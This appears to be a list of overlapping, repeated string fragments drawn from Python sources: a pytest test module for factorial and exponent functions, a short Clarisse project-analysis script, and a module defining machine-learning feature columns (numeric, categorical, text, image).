([1] +", "<= val_b and (val_a + delta) >= val_b return (not (val_a + delta)", "18] for f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a in", "max_m) // 2, max_m - 1, max_m) for (min_m, max_m) in min_max_groups] bound_vals", "Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import pytest from future.builtins import", "#return ((abs(val_a) - tolerance) <= abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b))", "< val_b) and (not (val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals =", "num + 1) for a in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1):", "in range(1, num + 1) for a in [a * b]])[-1] == fn1(num)", "min_max_groups] axis_bounds = [(min_m, min_m + 1, (min_m + max_m) // 2, max_m", "[tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds) for", "'''Test cases for Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import pytest", "abs(val_b)) delta = abs(tolerance) #return (val_a - delta) <= val_b and (val_a +", "b in range(1, num + 1) for a in [a * b]])[-1] ==", "+ delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2", "abs(tolerance) #return (val_a - delta) <= val_b and (val_a + delta) >= val_b", "in [1] for b in range(1, num + 1) for a in [a", "for a in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base,", "20.0), (3.0, 10.0)]) # for b in [2.0, 11.0, 20.0] for n in", "(min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m + 1, (min_m + max_m)", "test_fact(fixture_func1): for fn1, num in [(f, n) for (n,) in bound_values(*[(0, 18)]) #", "module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def", "[el] + avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds) for el in", "fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def", "range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance)", "for fn1, base, num in [(f, b, n) for (b, n) in bound_values(*[(2.0,", "delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2 for", "bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for ndx, axis in", "// 2 for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m + 1,", "def bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2 for (min_m, max_m) in", "def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown", "in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in [2.0, 11.0, 20.0] for", "print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__))", "(not (val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m)", "// 2, max_m - 1, max_m) for (min_m, max_m) in min_max_groups] bound_vals =", "10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base, num)", "(absolute_import, division, print_function, unicode_literals) import pytest from future.builtins import (ascii, filter, hex, map,", "1):]) for ndx, axis in enumerate(axis_bounds) for el in axis] return set(bound_vals) def", "min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for ndx, axis", "[classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base, num) assert in_epsilon(base ** num,", "[classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a in [1] for b in", "hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b,", "-*- '''Test cases for Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import", "val_b) and (not (val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m", "map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001):", "in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module:", "delta) < val_b) and (not (val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals", "b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base, num in [(f, b, n)", "[(f, n) for (n,) in bound_values(*[(0, 18)]) # for n in [0, 9,", "+ max_m) // 2, max_m - 1, max_m) for (min_m, max_m) in min_max_groups]", "delta) <= val_b and (val_a + delta) >= val_b return (not (val_a +", "for el in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module):", "cases for Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import pytest from", "for a in [1] for b in range(1, num + 1) for a", "tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a - delta) <= val_b and", "setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup", "num in [(f, b, n) for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)])", "(Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f, n) for (n,)", "for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in [2.0,", "for (n,) in bound_values(*[(0, 18)]) # for n in [0, 9, 18] for", "max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for", "+ 1) for a in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for", "min_m + 1, (min_m + max_m) // 2, max_m - 1, max_m) for", "filter, hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a,", "def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request):", "max_m - 1, max_m) for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] +", "from future.builtins import (ascii, filter, hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}}", "= [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds)", "avg_vals = [(min_m + max_m) // 2 for (min_m, max_m) in min_max_groups] axis_bounds", "function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function", "{0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function):", "for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx +", "classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b) and #", "[0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for", "b in [2.0, 11.0, 20.0] for n in [3.0, 6.0, 10.0] for f", "6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base,", "in [(f, n) for (n,) in bound_values(*[(0, 18)]) # for n in [0,", "(ascii, filter, hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def", "(val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m) //", "(base ** num) == fn1(base, num) assert in_epsilon(base ** num, fn1(base, num), 0.001" ]
[ "clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\",", "import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\":", "utf-8 -*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\":", "-*- coding: utf-8 -*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info =", "coding: utf-8 -*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = {", "\"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\",", "# -*- coding: utf-8 -*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info", "-*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG", "from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\":", "analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\": \"Project1\", \"plugin_config\":", "{ \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\": \"Project1\", \"plugin_config\": {} }", "\"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\": \"Project1\", \"plugin_config\": {} } AnalyzeClarisse(**analyze_info).analyse()", "= { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\": \"Project1\", \"plugin_config\": {}", "<filename>help/examples/only_analyze_demo.py # -*- coding: utf-8 -*- \"\"\"only analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse", "rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\",", "analyze clarisse\"\"\" from rayvision_clarisse.analyse_clarisse import AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\":", "AnalyzeClarisse analyze_info = { \"cg_file\": r\"D:\\files\\CG FILE\\clarisse_test1.project\", \"workspace\": \"c:/workspace\", \"software_version\": \"clarisse_ifx_4.0_sp3\", \"project_name\": \"Project1\"," ]
[ "split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None):", "it is not empty, then the words will be replaced with a matrix,", "TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict,", "KIND, either express or implied. # See the License for the specific language", "Unless required by applicable law or agreed to in writing, software # distributed", "data used to train machine learning models. Data to be used in training,", "(BOW or tf*idf) should be normalize (used with L2 norm) strip_html: Boolean on", "\"\"\"Creates a feature representing the target label or value of the instance. Args:", "feature column. Returns: An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None,", "split text stop_words: Either list or set, specifying the stop words to be", "from _transforms import FeatureVector def key(name): \"\"\"Creates a feature representing the key of", "of logarithm to be applied. Returns: An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name,", "key of the instance. Args: name: Name of feature column. Returns: An instance", "to the vocab. split_regex: Regex rule to extract the column value. Defaults to", "target(name='target'): \"\"\"Creates a feature representing the target label or value of the instance.", "An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None,", "should be normalize (used with L2 norm) strip_html: Boolean on whether html_markup should", "models. Data to be used in training, prediction and evaluation is described in", "to be requested from nltk. Use [] for no stopwords. For more info", "split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form", "this file except in compliance with the License. # You may obtain a", "default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False,", "r\"\"\"Creates a categorical or discrete value column within a feature. Args: name: Name", "column. Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a", "\"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical", "with a matrix, one row for each word frequency_threshold: Frequency threshold below which", "feature representing the key of the instance. Args: name: Name of feature column.", "Returns: An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None,", "return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1,", "feature. Args: name: Name of feature column. default: Default value for the column.", "ANY KIND, either express or implied. # See the License for the specific", "return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or", "register_transformer from _transforms import ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates a", "def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within a feature. Args: name:", "to group on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default,", "constructing the vocabulary/ngrams. split_regex: Regex rule to split text stop_words: Either list or", "the tokenizer should generate (2 for bigrams etc) use_tf_idf: Boolean on whether the", "nltk. Use [] for no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on", "empty, then the words will be replaced with a matrix, one row for", "use_tf_idf: Boolean on whether the BOW representation should be tf*idf normalize: Boolean on", "a feature representing the target label or value of the instance. Args: name:", "the specific language governing permissions and # limitations under the License. \"\"\"Classes for", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "described in terms of features. This module provides functionality to define those features,", "Returns: An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates", "FeatureMetadata from _features import ImageFeatureColumn from _features import KeyFeatureColumn from _features import NumericFeatureColumn", "FeatureVector def key(name): \"\"\"Creates a feature representing the key of the instance. Args:", "ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image", "of feature column. Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'):", "the instance. Args: name: Name of feature column. Returns: An instance of TargetFeatureColumn.", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "text should be stemmed ngrams: number of ngrams the tokenizer should generate (2", "of html tags whose text should be ignored word2vec_dict: Dictionary of word ->", "len 3. - Use r'\\S+' to group on non-whitespace. Returns: An instance of", "whether the BOW representation should be tf*idf normalize: Boolean on whether sparse vector", "should be tf*idf normalize: Boolean on whether sparse vector (BOW or tf*idf) should", "or tf*idf) should be normalize (used with L2 norm) strip_html: Boolean on whether", "OF ANY KIND, either express or implied. # See the License for the", "words to be ignored or a string representing the language of stopwords to", "should be removed before processing removable_tags: list of html tags whose text should", "key(name): \"\"\"Creates a feature representing the key of the instance. Args: name: Name", "Args: name: name of image feature default: Default value for the column. Returns:", "Name of feature column. default: Default value for the column. frequency_threshold: Frequency threshold", "the stop words to be ignored or a string representing the language of", "sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a", "column. Returns: An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0):", "on whether sparse vector (BOW or tf*idf) should be normalize (used with L2", "import KeyFeatureColumn from _features import NumericFeatureColumn from _features import TargetFeatureColumn from _features import", "feature column. default: Default value for the column. sampling_percentage: Percentage value (0-100) for", "a free-form text value column within a feature. Args: name: Name of feature", "within a feature. Args: name: Name of feature column. default: Default value for", "then the words will be replaced with a matrix, one row for each", "BOW representation should be tf*idf normalize: Boolean on whether sparse vector (BOW or", "value. Defaults to None, which means no splitting. Examples: - Use r'\\w{1,}' to", "those features. \"\"\" from _features import CategoricalFeatureColumn from _features import Feature from _features", "default: Default value for the column. Returns: An instance of ImageFeatureColumn. \"\"\" return", "governing permissions and # limitations under the License. \"\"\"Classes for defining the data", "set, specifying the stop words to be ignored or a string representing the", "and data transformations to apply to produce those features. \"\"\" from _features import", "Args: name: Name of feature column. default: Default value for the column. log_base:", "tags whose text should be ignored word2vec_dict: Dictionary of word -> word_vectors. If", "License. \"\"\"Classes for defining the data used to train machine learning models. Data", "[] for no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text", "Boolean on whether sparse vector (BOW or tf*idf) should be normalize (used with", "be ignored word2vec_dict: Dictionary of word -> word_vectors. If it is not empty,", "in training, prediction and evaluation is described in terms of features. This module", "All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the", "\"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False,", "Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache", "use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column within", "_features import FeatureMetadata from _features import ImageFeatureColumn from _features import KeyFeatureColumn from _features", "nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be stemmed ngrams: number of ngrams", "should be ignored word2vec_dict: Dictionary of word -> word_vectors. If it is not", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be stemmed ngrams:", "define those features, and data transformations to apply to produce those features. \"\"\"", "row for each word frequency_threshold: Frequency threshold below which words/ngrams are not added", "norm) strip_html: Boolean on whether html_markup should be removed before processing removable_tags: list", "the License. \"\"\"Classes for defining the data used to train machine learning models.", "from _features import KeyFeatureColumn from _features import NumericFeatureColumn from _features import TargetFeatureColumn from", "- Use r'\\w{3,}' to group alphanumerical characters of len 3. - Use r'\\S+'", "\"\"\" from _features import CategoricalFeatureColumn from _features import Feature from _features import FeatureColumn", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "vocab. split_regex: Regex rule to extract the column value. Defaults to None, which", "Dictionary of word -> word_vectors. If it is not empty, then the words", "matrix, one row for each word frequency_threshold: Frequency threshold below which words/ngrams are", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "evaluation is described in terms of features. This module provides functionality to define", "that should be sampled for constructing the vocabulary/ngrams. split_regex: Regex rule to split", "be tf*idf normalize: Boolean on whether sparse vector (BOW or tf*idf) should be", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "not empty, then the words will be replaced with a matrix, one row", "Use r'\\w{1,}' to group alphanumerical characters of len 1. - Use r'\\w{3,}' to", "required by applicable law or agreed to in writing, software # distributed under", "An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a", "characters of len 3. - Use r'\\S+' to group on non-whitespace. Returns: An", "ignored or a string representing the language of stopwords to be requested from", "(2 for bigrams etc) use_tf_idf: Boolean on whether the BOW representation should be", "TextFeatureColumn from _predict import FeatureProducer from _registries import register_analyzer from _registries import register_transformer", "applicable law or agreed to in writing, software # distributed under the License", "import FeatureColumn from _features import FeatureFormat from _features import FeatureMetadata from _features import", "or a string representing the language of stopwords to be requested from nltk.", "normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column within a", "be stemmed ngrams: number of ngrams the tokenizer should generate (2 for bigrams", "feature default: Default value for the column. Returns: An instance of ImageFeatureColumn. \"\"\"", "name of image feature default: Default value for the column. Returns: An instance", "or agreed to in writing, software # distributed under the License is distributed", "normalize (used with L2 norm) strip_html: Boolean on whether html_markup should be removed", "of feature column. default: Default value for the column. sampling_percentage: Percentage value (0-100)", "column. default: Default value for the column. frequency_threshold: Frequency threshold below which words", "CONDITIONS OF ANY KIND, either express or implied. # See the License for", "to apply to produce those features. \"\"\" from _features import CategoricalFeatureColumn from _features", "strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column within a feature.", "defining the data used to train machine learning models. Data to be used", "Name of feature column. Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def", "Default value for the column. Returns: An instance of ImageFeatureColumn. \"\"\" return ImageFeatureColumn(name,", "a categorical or discrete value column within a feature. Args: name: Name of", "frequency_threshold: Frequency threshold below which words are not added to the vocab. split_regex:", "or discrete value column within a feature. Args: name: Name of feature column.", "the vocabulary/ngrams. split_regex: Regex rule to split text stop_words: Either list or set,", "Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0", "is described in terms of features. This module provides functionality to define those", "data transformations to apply to produce those features. \"\"\" from _features import CategoricalFeatureColumn", "text should be ignored word2vec_dict: Dictionary of word -> word_vectors. If it is", "image column within a feature.. Args: name: name of image feature default: Default", "specific language governing permissions and # limitations under the License. \"\"\"Classes for defining", "of image feature default: Default value for the column. Returns: An instance of", "default: Default value for the column. log_base: Base of logarithm to be applied.", "under the Apache License, Version 2.0 (the \"License\"); # you may not use", "language governing permissions and # limitations under the License. \"\"\"Classes for defining the", "instance. Args: name: Name of feature column. Returns: An instance of KeyFeatureColumn. \"\"\"", "writing, software # distributed under the License is distributed on an \"AS IS\"", "rule to extract the column value. Defaults to None, which means no splitting.", "You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "be used in training, prediction and evaluation is described in terms of features.", "License. # You may obtain a copy of the License at # #", "and evaluation is described in terms of features. This module provides functionality to", "strip_html: Boolean on whether html_markup should be removed before processing removable_tags: list of", "characters of len 1. - Use r'\\w{3,}' to group alphanumerical characters of len", "default=None): \"\"\"Creates an image column within a feature.. Args: name: name of image", "\"\"\"Creates a feature representing the key of the instance. Args: name: Name of", "representing the key of the instance. Args: name: Name of feature column. Returns:", "default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value", "column within a feature. Args: name: Name of feature column. default: Default value", "compliance with the License. # You may obtain a copy of the License", "frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False,", "stemmed ngrams: number of ngrams the tokenizer should generate (2 for bigrams etc)", "_features import FeatureColumn from _features import FeatureFormat from _features import FeatureMetadata from _features", "import NumericFeatureColumn from _features import TargetFeatureColumn from _features import TextFeatureColumn from _predict import", "label or value of the instance. Args: name: Name of feature column. Returns:", "log_base=0): \"\"\"Creates a numeric column within a feature. Args: name: Name of feature", "frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value column within a feature. Args:", "for bigrams etc) use_tf_idf: Boolean on whether the BOW representation should be tf*idf", "2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License,", "each word frequency_threshold: Frequency threshold below which words/ngrams are not added to the", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "to produce those features. \"\"\" from _features import CategoricalFeatureColumn from _features import Feature", "def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value column within", "added to the vocab. split_regex: Regex rule to extract the column value. Defaults", "import TargetFeatureColumn from _features import TextFeatureColumn from _predict import FeatureProducer from _registries import", "the column value. Defaults to None, which means no splitting. Examples: - Use", "import Feature from _features import FeatureColumn from _features import FeatureFormat from _features import", "ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates a feature representing the key", "Either list or set, specifying the stop words to be ignored or a", "- Use r'\\w{1,}' to group alphanumerical characters of len 1. - Use r'\\w{3,}'", "stop words to be ignored or a string representing the language of stopwords", "Default value for the column. frequency_threshold: Frequency threshold below which words are not", "a feature. Args: name: Name of feature column. default: Default value for the", "text value column within a feature. Args: name: Name of feature column. default:", "default: Default value for the column. sampling_percentage: Percentage value (0-100) for the number", "import ImageFeatureColumn from _features import KeyFeatureColumn from _features import NumericFeatureColumn from _features import", "_features import TargetFeatureColumn from _features import TextFeatureColumn from _predict import FeatureProducer from _registries", "not use this file except in compliance with the License. # You may", "to the vocab. Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default,", "TargetFeatureColumn from _features import TextFeatureColumn from _predict import FeatureProducer from _registries import register_analyzer", "\"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the target label or", "the column. frequency_threshold: Frequency threshold below which words are not added to the", "of feature column. Returns: An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name,", "features. This module provides functionality to define those features, and data transformations to", "for the column. frequency_threshold: Frequency threshold below which words are not added to", "ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column", "column. frequency_threshold: Frequency threshold below which words are not added to the vocab.", "split_regex: Regex rule to split text stop_words: Either list or set, specifying the", "the data used to train machine learning models. Data to be used in", "License, Version 2.0 (the \"License\"); # you may not use this file except", "the target label or value of the instance. Args: name: Name of feature", "ngrams: number of ngrams the tokenizer should generate (2 for bigrams etc) use_tf_idf:", "use_stemmer: Boolean on whether text should be stemmed ngrams: number of ngrams the", "should generate (2 for bigrams etc) use_tf_idf: Boolean on whether the BOW representation", "alphanumerical characters of len 3. - Use r'\\S+' to group on non-whitespace. Returns:", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "Returns: An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name,", "split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None,", "removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column within a feature..", "whose text should be ignored word2vec_dict: Dictionary of word -> word_vectors. If it", "produce those features. \"\"\" from _features import CategoricalFeatureColumn from _features import Feature from", "not added to the vocab. Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn(", "used to train machine learning models. Data to be used in training, prediction", "# you may not use this file except in compliance with the License.", "Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature", "import TextFeatureColumn from _predict import FeatureProducer from _registries import register_analyzer from _registries import", "agreed to in writing, software # distributed under the License is distributed on", "group alphanumerical characters of len 1. - Use r'\\w{3,}' to group alphanumerical characters", "no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be", "no splitting. Examples: - Use r'\\w{1,}' to group alphanumerical characters of len 1.", "(the \"License\"); # you may not use this file except in compliance with", "# limitations under the License. \"\"\"Classes for defining the data used to train", "Use r'\\w{3,}' to group alphanumerical characters of len 3. - Use r'\\S+' to", "# Unless required by applicable law or agreed to in writing, software #", "frequency_threshold=0): \"\"\"Creates a free-form text value column within a feature. Args: name: Name", "learning models. Data to be used in training, prediction and evaluation is described", "feature column. Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates", "by applicable law or agreed to in writing, software # distributed under the", "default: Default value for the column. frequency_threshold: Frequency threshold below which words are", "threshold below which words/ngrams are not added to the vocab. Returns: An instance", "This module provides functionality to define those features, and data transformations to apply", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "# Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the", "frequency_threshold: Frequency threshold below which words/ngrams are not added to the vocab. Returns:", "image feature 